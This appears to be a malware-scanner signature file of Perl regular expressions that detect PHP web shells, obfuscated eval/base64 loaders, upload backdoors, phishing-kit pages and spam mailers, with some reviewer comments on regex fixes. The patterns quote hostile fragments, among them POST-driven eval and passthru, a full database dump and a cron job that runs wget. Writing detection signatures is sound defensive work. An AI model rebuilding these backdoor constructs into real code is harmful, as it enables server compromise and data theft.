qr/var _0x2515=\[\"\",\"\\x6A\\x6F\\x69\\x6E\".+?\"\];document\[_0x2515\[5\]\].+?\(_0x2515\[0\]\)\);/is,
qr/<\?php\s+if \(!defined\(\'stream_context_create \'\)\)\s+\{\s+define\(\'stream_context_create \', 1\);.+?\$([A-z0-9_]{1,20})=\"rawurl\" \. \"decode\";return \$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\);\}.+?eval\/\*([A-z0-9_]{1,20})\*\/\(([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}), \$([A-z0-9_]{1,20})\)\);\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'g\'\. \'z\'\. \'u\'\. \'n\'\. \'c\'\. \'o\'\. \'m\'\. \'p\'\. \'r\'\. \'e\'\. \'s\'\. \'s\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'i\' \.\'m\' \.\'p\' \.\'l\' \.\'o\' \.\'d\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzun\', \'comp\', \'ress\'\) ;\$([A-z0-9_]{1,20}) = \'\'\.chr\(105\)\.\'\'\.chr\(109\)\.\'\'\.chr\(112\)\.\'l\'\.chr\(111\)\.\'de\' ; \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); eval \( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \'\', \$([A-z0-9_]{1,20}) \) \) \) \) ; \?>/is,
qr/<\?php \$([A-z0-9_]{10,})=.+?eval\(gzinflate\(base64_decode\(\$([A-z0-9_]{10,})\)\)\); \?>/is,
qr/<\?php.+?\$id = \"([A-z0-9_]{1,20})\";\s+\$slow = array\(.+?\$wp2wp=\'str_r\'\.\'ot\'\.\'1\'\.\'3\';.+?if\(isset\(\$_GET\[1\]\)\)\{\$_=\$_GET;\$_\[1\]\(\$_\[2\]\);exit;\}/is,
qr/<\?php\s+\/\/die\(\"Temporary Under Maintenance\"\);.+?if\(is_uploaded_file\(\$_FILES\[([A-z0-9_]{1,20})\]\[tmp_name\]\)\) \{ \@copy\(\$_FILES\[([A-z0-9_]{1,20})\]\[tmp_name\],\$_FILES\[([A-z0-9_]{1,20})\]\[name\]\); \}\};\}.+?404 Not Found<\/h1>\";\s+exit\(\);\s+\}\?>/is,
qr/<\?php\s+if\(isset\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\(\$_REQUEST\[\'([A-z0-9_]{1,20})\'\]\);exit;\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?array\(\'ba\' \,\'se\' \,\'64\' \,\'_d\' \,\'ec\' \,\'od\' \,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'g\'\, \'z\'\, \'u\'\, \'n\'\, \'c\'\, \'o\'\, \'m\'\, \'p\'\, \'r\'\, \'e\'\, \'s\'\, \'s\'\) ;\$.+?eval.+?\) \) \) \) ; \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array.+? array\(\'bas\' \,\'e64\' \,\'_de\' \,\'cod\' \,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzu\'\, \'nco\'\, \'mpr\'\, \'ess\'\) ;\$([A-z0-9_]{1,20}).+?eval.+?\) \) \) \) ; \?>/is,
qr/<\?php\s+if \(isset\(\$_POST\[\'([A-z0-9_-]{1,20})\'\]\)\) \{\s+eval\(\$_POST\[\'([A-z0-9_-]{1,20})\'\]\);\s+\};\s+\?>/is,
qr/<\?php.+?\*\/\$([O0o]{1,20})=urldecode\(\'\%\d\d.+?\$GLOBALS\[\'([O0o]{1,20})\'\]=\$([O0o]{1,20})\{\d\}.+?eval\(\$GLOBALS\[\'([O0o]{1,20})\'\]\(.+?([A-z0-9]{1,20})\Z/is,
qr/<\?php if\(isset\(\$_POST\[\"cod\\x65\"\]\)\)\{eval\(base64_decode\(\$_POST\[\"co\\x64e\"\]\)\);\}\s+\?>/is,
qr/<\?php if \(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\{eval\(base64_decode\(\$_POST\[\"([A-z0-9_]{1,20})\"\]\)\);exit;\} \?>/is,
qr/<html>\s+<head>\s+<meta http-equiv=\"refresh\" content=\"2; url=http:\/\/.+?\">\s+<\/head>\s+<body>\s+<h1>Loading\.\.\.<\/h1>\s+<\/body>/is,
qr/<\?php\s+\@error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); if \(count\(\$_POST\) < 2\) \{ die\(PHP_OS\.chr\(.+?preg_split\(\'\/;\/\',strtolower\(\$.+?next\(explode\(\'\@\', \$.+?return \$([A-z0-9]{1,20}); \} \?>/is,
qr/<!--visitorTracker--><\?php \@ob_start\(\);\@ini_set\(\"display_errors\",0\);\@error_reporting\(0\);echo base64_decode\(.+?\"\);\?><!--visitorTracker-->/is,
qr/<\?php\s+if\(!empty\(\$_SERVER\[\'HTTP_USER_AGENT\'\]\)\) \{ \$([A-z0-9_]{1,20}) = array\(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\", \"StackRambler\"\); if\(preg_match\(\'\/\' \. implode\(\'\|\', \$([A-z0-9_]{1,20})\) \. \'\/i\', \@\$_SERVER\[\'HTTP_USER_AGENT\'\]\)\).+?\$([A-z0-9_]{1,20})\[\]=\@realpath\(\$([A-z0-9_]{1,20})\.DIRECTORY_SEPARATOR\.\$([A-z0-9_]{1,20})\)\.DIRECTORY_SEPARATOR; else continue; .+?return \$([A-z0-9_]{1,20}) ; \} \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'.+?\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\"\",([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20}),\$([A-z0-9_]{1,20})\)\); \$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20}); \$([A-z0-9_]{1,20})\(\"\"\); \$([A-z0-9_]{1,20})=\(([0-9_]{1,20})-([0-9_]{1,20})\); \$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})-1; \?>/is,
qr/<\?php\s+echo \'<img src=.+?\$xSoftware = trim\(getenv\(\"SERVER_SOFTWARE\"\)\);.+?if \(function_exists\(\"posix_getpwuid\"\) && function_exists\(\"posix_getgrgid\"\)\).+?\?> ;-\) <\/div>\s+<\/div>\s+<\/body>\s+<\/html>>/is,
qr/<\? eval\(base64_decode\(\'([A-z0-9_]{1,20}).+?([A-z0-9_=]{1,20})\'\)\); \?>/is,
qr/<\?php \$([A-z]{1,3})=base64_decode\(\'([A-z0-9=]{1,20})\'\)\.\$_GET\[\'([A-z]{1,3})\'\]\.\'([A-z]{1,3})\';\@\$([A-z]{1,3})\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\);\?>([A-z0-9_]{1,20})/is,
qr/<\?php\s+\/\*\s+\* hostname\.php\s+\*\/\s+\$hostname = gethostbyaddr\(\$_SERVER\[\'REMOTE_ADDR\'\]\); \/\/Get User Hostname\s+\$blocked_words = array\(.+?foreach\(\$blocked_words as \$word\) \{.+?\}\s+\?>/is,
qr/<\?php\s+require_once \'hostname\.php\';\s+\$praga=rand\(\);\s+\$praga=md5\(\$praga\);\s+header\(\"location: login\.php.+?\$praga\$praga\"\);\s+\?>/is,
qr/<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4\.01 Transitional\/\/EN\">\s+<html>\s+<head>\s+<title>.+?<body style=\"visibility:hidden\" onload=\"unhideBody\(\)\">.+?new MaskedPassword\(document\.getElementById\(.+?<\/body>\s+<\/html>/is,
qr/<\?php\s+if\(\$_POST\[.+?Apple Info.+?header \(\"Location: index\.php\"\);\s+\}\s+\?>/is,
qr/<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4\.01 Transitional\/\/EN\">\s+<html>\s+<head>\s+<title>.+?<body style=\"visibility:hidden\" onload=\"unhideBody\(\)\">.+?src=\"images\/sbmit\.png\"><\/div>\s+<\/div>\s+<\/body>\s+<\/html>/is,
qr/<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4\.01 Transitional\/\/EN\">\s+<html>\s+<head>\s+<title>.+?<body style=\"visibility:hidden\" onload=\"unhideBody\(\)\">.+?src=\"images\/apl\.gif\" alt=\"\" title=\"\" border=0 width=77 height=77><\/div>\s+<\/div>\s+<\/body>\s+<\/html>/is,
qr/<\?\s+include\(\'blocker\.php\'\);\s+\$DIR=md5\(rand\(0,100000000000\)\);.+?fwrite\(\$file,\$ip\.\" - \"\.gmdate \(\"Y-n-d\"\)\.\" \@ \"\.gmdate \(\"H:i:s\"\)\.\"\\n\"\);\s+\?>/is,
qr/<\?php\s+\$hostname = gethostbyaddr\(\$_SERVER\[\'REMOTE_ADDR\'\]\);\s+\$blocked_words = array\(\"above\",\"google\",\"softlayer\",\"amazonaws\",\"cyveillance\",\"phishtank\",\"dreamhost\",\"netpilot\",\"calyxinstitute\",\"tor-exit\", \"paypal\"\);.+?foreach\(\$bannedIP as \$ip\) \{\s+if\(preg_match\(\'\/\' \. \$ip \. \'\/\',\$_SERVER\[\'REMOTE_ADDR\'\]\)\)\{\s+header\(\'HTTP\/1\.0 404 Not Found\'\);.+?\'facebookexternalhit\'\) !== false\) \{ header\(\'HTTP\/1\.0 404 Not Found\'\); exit; \}\s+\?>/is,
qr/<\?php error_reporting\(0\);\$([A-z0-9_=]{1,20})=\"([A-z0-9_=]{1,20})\";eval\(base64_decode\(\"([A-z0-9_=]{1,20}).+?([A-z0-9_=]{1,20})\"\)\); \?>/is,
qr/<\?php\s+\$([A-z0-9_=]{1,3}) = \"([A-z0-9_=]{20,}).+?\$_REQUEST\[\'([A-z0-9_=]{1,20})\'\]\(\"\{\$_REQUEST\[\'([A-z0-9_=]{1,20})\'\]\}\(\{\$_REQUEST\[\'([A-z0-9_=]{1,20})\'\]\}\(\'\{\$([A-z0-9_=]{1,3})\}\'\)\);\"\);\s+\?>/is,
qr/<form action=\"\" method=\"post\"><input type=\"text\" name=\"_f__f\" value=\"\"\/><input type=\"submit\" value=\"&gt;\"\/><\/form>/is,
qr/<\?php copy\(\'http:\/\/dl\.dropboxusercontent\.com\/s\/([A-z0-9]{1,20})\/([A-z0-9]{1,20})\.zip\',\'([A-z0-9]{1,20})\.php\'\);exit; \?>/is,
qr/<\?php error_reporting\(0\);\$\w=\"\w\";\$\w=\"([A-z0-9_=]{1,20})\";eval\(base64_decode\(.+?\)\); \?>/is,
qr/<\?php error_reporting\(0\);if\(isset\(\$_POST\[\"\w\"\]\) and isset\(\$_POST\[\"\w\"\]\)\)\{if\(isset\(\$_POST\[\"input\"\]\)\)\{\$user_auth=\"&l=\"\.base64_encode\(\$_POST\[\"\w\"\]\).+?\{print \"sys_active\"\.\`uname -a\`;\}\} \?>/is,
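# Loader that spells base64_decode as 'base'.(32*2).'_de'.'code' and ends in a one-field POST form.
# The '*' in (32*2) is escaped: left bare it quantifies the preceding '2', so the entry matched
# "(32)" or "(322)" but never the literal "(32*2)" that the PHP source contains.
qr/<\?php \$([A-z0-9_]{1,20})=\'base\'\.\(32\*2\)\.\'_de\'\.\'code\';\$([A-z0-9_]{1,20})=\$([A-z0-9_]{1,20})\(str_replace\(\"\\n\", \'\', \'([A-z0-9_]{20,}).+?<form action=\"\" method=\"post\"><input type=\"text\" name=\"([A-z0-9_]{1,20})\" value=\"\"\/><input type=\"submit\" value=\"&gt;\"\/><\/form>/is,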
qr/<\?php.+?\$xml = \$\w->response->asXML\(\);\s+echo base64_encode\(\$xml\);.+?\$xml_str = base64_decode\(\$str\);.+?echo \" error num: \"\.\$errno\.\' : \'\.\$errstr;\s+\}\s+\}\s+\}\s+\?>/is,
# A '//' comment made of 500 or more base64-alphabet characters that runs to the end of the
# input (\Z also accepts one trailing newline).
# NOTE(review): the range A-z also covers the six ASCII characters between 'Z' and 'a'
# ([ \ ] ^ _ `); A-Za-z is the tighter spelling. The same range is used by many entries here.
qr/\/\/([A-z0-9+\/]{500,})\Z/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20}).+?([A-z0-9_]{1,20})\*\/\$([A-z0-9_]{1,20})\)eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\).+?([A-z0-9_]{1,20});([A-z0-9_]{1,20})\';/is,
qr/<\?php.+?\$login=\"([A-z0-9_]{1,20})\";\s+\$md=str_rot13\(\"([A-z0-9_]{1,20})\"\);\s+\$mdh = str_rot13\(\'([A-z0-9_]{1,20})\'\);\s+\$md5_pass=\"([A-z0-9]{32})\";.+?eval\(\$mdh\(\$md\(strrev\(.+?\s+\?>/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?exit,\$([A-z0-9_]{1,20})\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\).+?([A-z0-9_]{1,20})\)\';/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?\$([A-z0-9_]{1,20})\)\)die;eval\(\$([A-z0-9_]{1,20})\(\/\*([A-z0-9_]{1,20})\'\..+?\(([A-z0-9_]{1,20})\)\';/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?if\(!\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\),\$([A-z0-9_]{1,20})\)\)eval\(\$([A-z0-9_]{1,20})\(\$.+?\(([A-z0-9_]{1,20});([A-z0-9_]{1,20}),([A-z0-9_]{1,20})\';/is,
qr/<\?php\s+\$([A-z0-9_]{1,20})=\'([A-z0-9_]{1,20})\'.+?\)eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\)\);.+?([A-z0-9_]{1,20})\';/is,
qr/<\?php \/\* WARNING: This file is protected by copyright law\. To reverse engineer or decode this file is strictly prohibited\. \*\/\s+\$\w=\"([A-z0-9]{20,}).+?\";eval\(base64_decode\(\".+?\"\)\);return;\?>/is,
qr/<\?php error_reporting\(0\);\$\w=\"eval\(base64_decode\(.+?\"\)\); \?>/is,
qr/<\?php if\(isset\(\$_POST\[([A-z0-9_]{1,20})\]\)\)\{passthru\(\$_POST\[([A-z0-9_]{1,20})\]\); die\(\);\} include\(\"\.\.\/includes\/configure\.php\"\); passthru\(\"mysqldump -u\"\.DB_SERVER_USERNAME\s+\. \" --password=\" \. DB_SERVER_PASSWORD \. \" --all-databases\"\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\"b\"\.\"ase\"\.\"64_de\"\.\"code\";eval\(\$([A-z0-9_]{1,20})\(\".+?\)\);/is,
qr/<\? \/\*\*\/eval\(base64_decode\(\'aWYo.+?\'\)\); \?>/is,
qr/<\?php\s+\/\/Starting calls\s+if \(!function_exists\(\"getmicrotime\"\)\).+?<\/body><\/html><\?php chdir\(\$lastdir\); N3tshexit\(\); \?>/is,
qr/<\?\s+if\(!empty\(\$_SERVER\[\'HTTP_USER_AGENT\'\]\)\) \{.+?move_uploaded_file\(\$_FILES\[.+?fotTKL\(\$gaza_text,\$gaza_text1,\$dir\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?array\(\'ba\' ,\'se\' ,\'64\' ,\'_d\' ,\'ec\' ,\'od\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzun\', \'comp\', \'ress\'\) ;\$([A-z0-9_]{1,20}) = .+?eval.+?\) \) \) \) ; \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'s\'\.chr\(116\)\.\'rrev\';\$([A-z0-9_]{1,20}) = array\(\'.+?\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/\/\*([A-z0-9]{1,6})\*\/\s+\@include \"\\([A-z0-9]{1,6})\\([A-z0-9]{1,6})\\([A-z0-9]{1,6}).+?([A-z0-9]{1,6})\\([A-z0-9]{1,6})\";\s+\/\*([A-z0-9]{1,6})\*\//is,
qr/<\?php\s+\$([A-z0-9]{1,6})=\$_REQUEST\[\'sort\'\];\$([A-z0-9]{1,6})=\'\';\$([A-z0-9]{1,6})=\"wt8m4.+?\$([A-z0-9]{1,6})=strrev\(\"noi\"\.\"tcnuf\"\.\"_eta\"\.\"erc\"\);\$([A-z0-9]{1,6})=\$([A-z0-9]{1,6})\(\"\",\$([A-z0-9]{1,6})\(\$([A-z0-9]{1,6})\)\);\$([A-z0-9]{1,6})\(\);.+?\$_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\'<b>Success_Upload!!!<\/b><br><br>\';\}else\{echo\'<b>Error<\/b><br><br>\';\}\};\};/is,
qr/<\?php \@ini_set\(\"error_log\",null\);\@ini_set\(\"log_errors\",0\);\@ini_set\(\"max_execution_time\",0\);\@set_time_limit\(0\);error_reporting\(0\).+?\)\{\}else\{file_put_contents\(\$.+?\);\}else\{([A-z0-9]{1,6})_\(\$_SERVER\[\'DOCUMENT_ROOT\'\]\);\}\}\}\}\}\}\}\};/is,
qr/<\?php\s+\@ini_set\(\"display_errors\", \"0\"\);.+?if \(!\$npDcheckClassBgp\) \{.+?\$npDcheckClassBgp = \"([A-z0-9]{1,6})\";\s+\}\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'ba\'\.\'s\'\.\'e6\'\.\'4_\'\.\'de\'\.\'code\'; \@eval\(\$([A-z0-9_]{1,20})\(.+?\'\)\);/is,
qr/<\?php\s+ignore_user_abort\(\);.+?system\(base64_decode\(.+?system\(\'echo \"\* \* \* \* \* wget http:\/\/\'\.\$_SERVER\[\"HTTP_HOST\"\]\.\$_SERVER\[\"REQUEST_URI\"\]\.\'\" \| crontab\'\);\s+\?>/is,
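# Self-decoding loader: a for() loop rebuilds the payload from a 16-symbol alphabet and eval()s it.
# The '^' that closes the encoded string is escaped: left bare it is the start-of-string anchor
# (no /m is set), which cannot succeed after "<?php for(" has been consumed, so the entry was dead.
qr/<\?php for\(\$o=0,\$e=\'&\\\'\(\)\*\+,-\.:\].+?\(:\)\^\',\$d=\'\';\@ord\(\$e\[\$o\]\);\$o\+\+\)\{if\(\$o<16\)\{\$h\[\$e\[\$o\]\]=\$o;\}else\{\$d\.=\@chr\(\(\$h\[\$e\[\$o\]\]<<4\)\+\(\$h\[\$e\[\+\+\$o\]\]\)\);\}\}eval\(\$d\); \?>/is,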
qr/<\?php\s+\$ver = \'abcdefghijklmnopqrstuvwxyz\';\s+\$check = \$ver\{.+?\(\$check\(array\(\'\\n\', \';\'\).+?value=\"&amp;\"\/><\/form>/is,
qr/<\?php\s+\@error_reporting\(0\);\@set_time_limit\(0\);\s+\$code=\"%3B.+?\$code=\@urldecode\(\$code\);\$code=\@strrev\(\$code\);\@eval\(\$code\);\s+\?>/is,
qr/\\<\?php \$([A-z0-9_]{1,20})=\"([A-z0-9_]{50,})\"; \$([A-z0-9_]{1,20}) = str_replace\(\"b\",\"\",\"bsbtbrb_rbebpblacbe\"\);.+?\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\"z\",\"\",\"crzezatez_fzunctzizon\"\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\"\", \$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\"hd\", \"\", \$([A-z0-9_]{1,20})\.\$([A-z0-9_]{1,20})\.\$([A-z0-9_]{1,20})\.\$([A-z0-9_]{1,20})\)\)\); \$([A-z0-9_]{1,20})\(\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \"a\" \. \"\\x73\" \. \"\" \. \"\\x73\" \. \"E\" \. \"\\x72\" \. \"t\";\@\$.+?\"\\x29\" \. \"\\x29\" \. \"\" \. \"\\x29\" \. \"\\x3b\"\);exit;/is,
qr/<\?php if\(isset\(\$_POST\[\'([A-z0-9_]{1,20})\'\]\)\)\{\(\$([A-z0-9_]{1,20})= \$_POST\[\'([A-z0-9_]{1,20})\'\]\) && \@preg_replace\(\'\/ad\/e\',\'\@\'\.str_rot13\(\'riny\'\)\.\'\(\@eval\(base64_decode\(\$_POST\[([A-z0-9_]{1,20})\]\)\);\)\', \'add\'\);\}/is,
qr/<\?php class Bx\{static private \$_alpha=\".+?break;\}return implode\(\"\",\$x\);\}\}\$Bx=new Bx\(\);\@eVaL\(\$Bx->d\(\'.+?\'\)\);/is,
qr/<title>Vuln!! patch it Now!<\/title>\s+<\?php\s+echo \'<form action=\"\".+?Shell Uploaded ! :\)<b><br><br>\'; \}\s+else \{ echo \'<b>Not uploaded ! <\/b><br><br>\'; \}\s+\}\s+\?>/is,
qr/<\? eval\(gzinflate\(strrev\(unserialize\(str_rot13\(base64_decode\(.+?\)\)\)\)\)\); \?>/is,
qr/<\?php \$ip = getenv\(\"REMOTE_ADDR\"\);.+?Link Mailer.+?mail\(\$bilsnd,\$bilsub,\$bilsmg,\$bilhead,\$message\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'\'\.chr\(115\)\.\'trre\'\.chr\(118\)\.\'\';\$([A-z0-9_]{1,20}) = array\(.+?\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php.+?\[uname\]\"\.php_uname\(\)\.\"\[\/uname\]\".+?Go Xsender.+?<\/html>/is,
qr/<\?php \$([A-z0-9_]{1,20})=\'base6\'\.\'4\'\.\'_d\'\.\'eco\'\.\'de\'\.\'\'; \@eval\(\$([A-z0-9_]{1,20})\(.+?\'\.\'\'\)\);/is,
qr/<\?php if\(!function_exists\(.+?\.\'\/scopbin\';clearstatcache\(\);if\(!is_dir\(\$.+?\'; eval\(.+?\)\);\?>/is,
qr/<\?php \/\*([0-9]{1,20})\*\/ error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'display_errors\',\'Off\'\); \@eval\( base64_decode\(\'aWYo.+?\)\); \@ini_restore\(\'error_log\'\); \@ini_restore\(\'display_errors\'\); \/\*([0-9]{1,20})\*\/ \?>/is,
# NOTE(review): this entry is character-for-character identical to an earlier entry in this
# list (the  $code="%3B ... urldecode / strrev / eval  signature); one of the two is redundant.
qr/<\?php\s+\@error_reporting\(0\);\@set_time_limit\(0\);\s+\$code=\"%3B.+?\$code=\@urldecode\(\$code\);\$code=\@strrev\(\$code\);\@eval\(\$code\);\s+\?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'gz\'\. \'un\'\. \'co\'\. \'mp\'\. \'re\'\. \'ss\';\$([A-z0-9_]{1,20}) = \'ba\' \.\'se\' \.\'64\' \.\'_d\' \.\'ec\' \.\'od\' \.\'e\';\$([A-z0-9_]{1,20}) = \'i\' \.\'m\' \.\'p\' \.\'l\' \.\'o\' \.\'d\' \.\'e\';\$([A-z0-9_]{1,20}) = array\(.+?\); eval\( \$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\$([A-z0-9_]{1,20}) \(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = \'s\'\.chr\(116\)\.\'r\'\.chr\(114\)\.\'e\'\.chr\(118\)\.\'\';\$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'ed\'\.chr\(111\)\.\'c\'\.chr\(101\)\.\'\'\.chr\(100\)\.\'_4\'\.chr\(54\)\.\'\'\.chr\(101\)\.\'\'\.chr\(115\)\.\'\'\.chr\(97\)\.\'\'\.chr\(98\)\.\'\'\);\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'edolpmi\'\);\$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'et\'\.\'al\'\.\'fn\'\.\'iz\'\.\'g\'\);eval\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(\'\',\$([A-z0-9_]{1,20})\)\)\)\); \?>/is,
qr/<\?php \$([A-z0-9_]{1,20}) = array\(.+?\);\$([A-z0-9_]{1,20}) = array\(\'b\' ,\'a\' ,\'s\' ,\'e\' ,\'6\' ,\'4\' ,\'_\' ,\'d\' ,\'e\' ,\'c\' ,\'o\' ,\'d\' ,\'e\'\); \$([A-z0-9_]{1,20}) = array\(\'gzu\', \'nco\', \'mpr\', \'ess\'\) ;\$([A-z0-9_]{1,20}) = \'\'\.chr\(105\)\.\'\'\.chr\(109\)\.\'\'\.chr\(112\)\.\'l\'\.chr\(111\)\.\'de\' ; \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); \$([A-z0-9_]{1,20}) = \$([A-z0-9_]{1,20})\(\'\', \$([A-z0-9_]{1,20})\); eval \( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \$([A-z0-9_]{1,20})\( \'\', \$([A-z0-9_]{1,20}) \) \) \) \) ; \?>/is,
qr/<\? session_start\(\);\?> <html> <head><title>PHP Unzipper Spammer Tn Dz Maroc ! All Arabs<\/title>.+?\} \} \} echo \"<\/div>\";\} \?> <\/body> <\/html>\s+\/\* Mister Spy \*\//is,
qr/<\?php.+?\$d0mains = \@file\(\'\/etc\/named\.conf\'\);\s+\$domains = scandir\(\"\/var\/named\"\);.+?3xp1r3 Cyber Army\";\s+echo \"<\/body><\/html>\";\s+\?>/is,
qr/<\?php \$username = \"admin\"; \$password =.+?<h3> Safe Mode Fucker <\/h3>.+?Masspass\.php Done !<\/font><\/center>\"; \} break; \} \}\}\s+\?>/is,
qr/<link rel=\'shortcut icon\' href=\'http:\/\/www\.dz-streaming\.eu\/favicon\.ico\'>.+?eval\(\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28.+?\\x29\\x29\\x29\\x3B\"\);\s+\?>/is,
qr/<\?php \/\*([0-9]{1,20})\*\/ error_reporting\(0\); \@ini_set\(\'error_log\',NULL\); \@ini_set\(\'log_errors\',0\); \@ini_set\(\'display_errors\',\'Off\'\); \@eval\( base64_decode\(\'.+?\)\); \@ini_restore\(\'error_log\'\); \@ini_restore\(\'display_errors\'\); \/\*([0-9]{1,20})\*\/ \?>/is,
qr/<\?php.+?Carding Argentina.+?\$wso =.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\(\$wso\)\)\)\)\)\);.+?\?>\?><\?.+?value=\"Submit\"><\/form>\';\}\}\?>/is,
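# Hex-escaped $GLOBALS backdoor: builds a function name from base64 and calls it on $_POST["x"].
# The second assignment was written as an unescaped  ="\x63";  - inside qr// that \x63 is the
# regex escape for the character 'c', so only  ="c";  matched. Every other hex escape in this
# entry is matched literally (\\x..), so the literal form is accepted here as well; the plain
# 'c' form is kept so that nothing that matched before stops matching. The added group is
# non-capturing, so capture numbering is unchanged.
qr/<\?php \$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}\[\"\\x61j\\x76q\\x6c\\x65\\x69\\x66\"\]=\"\\x63\";if\(isset\(\$_GET\[\"a\\x62\\x63\\x311\"\]\)\)\{\$([A-z0-9_]{1,20})=\"(?:\\x63|c)\";\$\{\$([A-z0-9_]{1,20})\}=base64_decode\(\".+?\"\)\.\"([A-z0-9_]{1,20})\";\@\$\{\$\{\"GLOB\\x41\\x4c\\x53\"\}\[\"\\x61\\x6a\\x76\\x71l\\x65\\x69\\x66\"\]\}\(\$_POST\[\"\\x78\"\]\);exit\(\);\}\?>/is,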
qr/<\?php.+?<title>pastrulo<\/title>.+?\)\);\?>\'\)\);/is,
qr/<\?php\s+\$\w=\"\\x62\";\$\w=\"\\x65\".+?eval\( \$([A-z0-9_]{1,20})\(\$([A-z0-9_]{1,20})\(.+?\)\)\);\s+\?>/is,
qr/<\?php\s+\@error_reporting\(0\);\s+\@set_time_limit\(0\);\s+\$code = \".+?\@eval\(gzinflate\(base64_decode\(\$code\)\)\);\?>/is,
qr/<\?php \@ini_set\(\'display_errors\',0\).+?CPANEL CRACKER.+?s3curity\.tn \"; \?>\s+<\?\(\@copy\(\$_FILES\[\'f\'\]\[\'tmp_name\'\], \$_FILES\[\'f\'\]\[\'name\'\]\)\);\?>/is,
qr/<html>\s+<head>\s+<title>\s+Dark Shell.+?<h1>Dark Shell<\/h1>.+?\$items = scandir \(\$file\);.+?echo \"<\/table>\\n\";\s+\?>/is,
